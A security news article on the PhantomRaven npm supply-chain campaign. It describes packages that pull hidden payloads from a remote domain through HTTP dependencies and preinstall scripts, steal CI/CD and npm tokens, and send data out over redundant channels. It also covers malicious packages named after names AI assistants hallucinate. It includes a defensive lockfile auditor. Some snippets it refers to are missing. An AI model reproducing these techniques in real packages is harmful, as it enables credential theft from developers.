Koi Security has uncovered a massive supply-chain campaign dubbed PhantomRaven, which has silently infected the npm ecosystem with 126 malicious packages that have been collectively downloaded over 86,000 times. The campaign, active since August 2025, is designed to steal npm authentication tokens, GitHub credentials, and CI/CD secrets — while concealing its malicious code in dependencies invisible to most security scanners.
Koi Security’s Wings risk engine first detected unusual activity in October 2025 when several npm packages were seen making external network requests during installation — all pointing to the same domain.
“Our risk engine, Wings, flagged something strange in October 2025. Packages making external network requests during installation — all to the same suspicious domain,” the team wrote.
When investigators began unraveling the campaign, they discovered that 80 of the malicious packages were still active, continuously collecting credentials from developer systems across the globe. The report outlines a clear timeline:
- August 2025: Campaign begins; first 21 packages removed by npm.
- September–October 2025: 80 more packages uploaded, evading detection.
- October 2025: Campaign discovered by Koi Security’s behavioral analysis engine.
Despite the sophisticated delivery, the attackers’ operational security was surprisingly weak, using sequential email accounts like jpdtester01@hotmail[.]com to jpdtester13@gmail[.]com, all tied to usernames such as npmhell and npmpackagejpd.
What made PhantomRaven so elusive was its use of Remote Dynamic Dependencies (RDD) — a rarely used npm feature allowing dependencies to be fetched directly from HTTP URLs instead of the npm registry.
On the surface, these malicious packages appeared clean, containing nothing more than harmless code like:
“Open up one of these malicious packages on npm. Check the source code. You’ll find something like this… Completely harmless. A simple hello world script,” the report explained.
The real payload, however, was pulled from an external server at install time:
Because npm and most scanners don’t follow HTTP-based dependency links, these packages appeared to have “0 dependencies”, bypassing nearly every automated security check.
“The malicious code? Sitting on packages.storeartifact.com, waiting to be fetched at install time.”
The moment developers ran npm install, the malicious dependency was fetched and executed automatically using npm’s preinstall lifecycle script:
This design ensured that the payload executed without user consent, even if buried multiple layers deep in a dependency chain.
Koi Security notes, “Install a package that depends on a package that depends on a package with a malicious preinstall script? That code runs on your machine. Automatically.”
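The two properties described above, a dependency declared as an HTTP URL and an install-time lifecycle script, can both be checked for before anything is installed. The following is an added example, not code from Koi Security's report or from the campaign; the function names, package names and the `packages.example.invalid` host are constructed placeholders, and it assumes a `package-lock.json` with `lockfileVersion` 2 or 3.

```javascript
const DEP_FIELDS = ["dependencies", "devDependencies", "optionalDependencies", "peerDependencies"];
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
const URL_SPEC = /^https?:\/\//i; // plain HTTP(S) specifiers only; git+ URLs are out of scope here

// Audit one parsed package.json: URL-based dependency specifiers and install-time scripts.
function auditManifest(manifest, where = manifest.name || "<root>") {
  const findings = [];
  for (const field of DEP_FIELDS) {
    for (const [dep, spec] of Object.entries(manifest[field] || {})) {
      if (typeof spec === "string" && URL_SPEC.test(spec)) {
        findings.push({ where, type: "remote-dependency", detail: `${field}.${dep} -> ${spec}` });
      }
    }
  }
  for (const hook of INSTALL_HOOKS) {
    const cmd = manifest.scripts && manifest.scripts[hook];
    if (cmd) findings.push({ where, type: "install-script", detail: `${hook}: ${cmd}` });
  }
  return findings;
}

// Audit a parsed package-lock.json (lockfileVersion 2 or 3), which also lists transitive packages.
function auditLockfile(lock, allowedHosts = ["registry.npmjs.org"]) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (typeof entry.resolved === "string" && URL_SPEC.test(entry.resolved)) {
      const host = new URL(entry.resolved).hostname;
      if (!allowedHosts.includes(host)) {
        findings.push({ where: path, type: "off-registry-tarball", detail: entry.resolved });
      }
    }
    if (entry.hasInstallScript) {
      findings.push({ where: path, type: "install-script", detail: "hasInstallScript" });
    }
  }
  return findings;
}

// Constructed sample data; package names and the example.invalid host are placeholders.
const sampleManifest = {
  name: "hello-world-demo",
  dependencies: { "left-pad": "^1.3.0", "hidden-payload": "http://packages.example.invalid/hidden-payload.tgz" },
  scripts: { test: "node test.js" },
};
const sampleLock = { lockfileVersion: 3, packages: {
  "": { name: "app", dependencies: { "hello-world-demo": "^1.0.0" } },
  "node_modules/hello-world-demo": { resolved: "https://registry.npmjs.org/hello-world-demo/-/hello-world-demo-1.0.0.tgz" },
  "node_modules/hidden-payload": { resolved: "http://packages.example.invalid/hidden-payload.tgz", hasInstallScript: true },
} };

console.log(auditManifest(sampleManifest), auditLockfile(sampleLock));
```

Generating the lockfile with `npm install --package-lock-only --ignore-scripts` lets this audit run before any lifecycle script has had a chance to execute.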
Once executed, PhantomRaven began an aggressive reconnaissance and exfiltration routine.
1. Identity Harvesting
The malware first searched the developer’s system for email addresses in:
- Environment variables
- .gitconfig
- .npmrc
- package.json
2. CI/CD Credential Theft
It then scanned for tokens and credentials from popular automation tools, including:
- GitHub Actions
- GitLab CI/CD
- Jenkins
- CircleCI
- npm authentication tokens
The report highlights, “They want to know everything about your infrastructure — GitHub Actions tokens, GitLab CI credentials, Jenkins credentials, CircleCI tokens, npm authentication tokens.”
3. System Fingerprinting
The malware compiled a complete system profile, capturing the victim’s public IP, hostname, OS, username, directory, and Node.js version — essential data for targeting corporate and cloud environments.
4. Redundant Exfiltration
The exfiltration routines used three parallel channels to make sure the stolen data got out:
- HTTP GET with data encoded in URLs
- HTTP POST with JSON payloads
- WebSocket fallback for restricted networks
“Even in restricted network environments with aggressive firewalls, they’re getting their data out,” Koi Security warns.
Perhaps the most alarming discovery is PhantomRaven’s novel infection vector, dubbed slopsquatting — an AI-driven evolution of typosquatting.
Unlike classic name impersonation, PhantomRaven authors created packages that AI assistants hallucinated as legitimate recommendations.
“When developers ask AI assistants like GitHub Copilot or ChatGPT for package recommendations, the models sometimes suggest plausible-sounding package names that don’t actually exist. PhantomRaven created those non-existent packages.”
Examples include:
- eslint-comments (real: eslint-plugin-eslint-comments)
- unused-imports (real: eslint-plugin-unused-imports)
- transform-react-remove-prop-types (real: babel-plugin-transform-react-remove-prop-types)
These AI-validated fakes were designed to trick developers into trusting malicious packages, blending social engineering with artificial intelligence errors.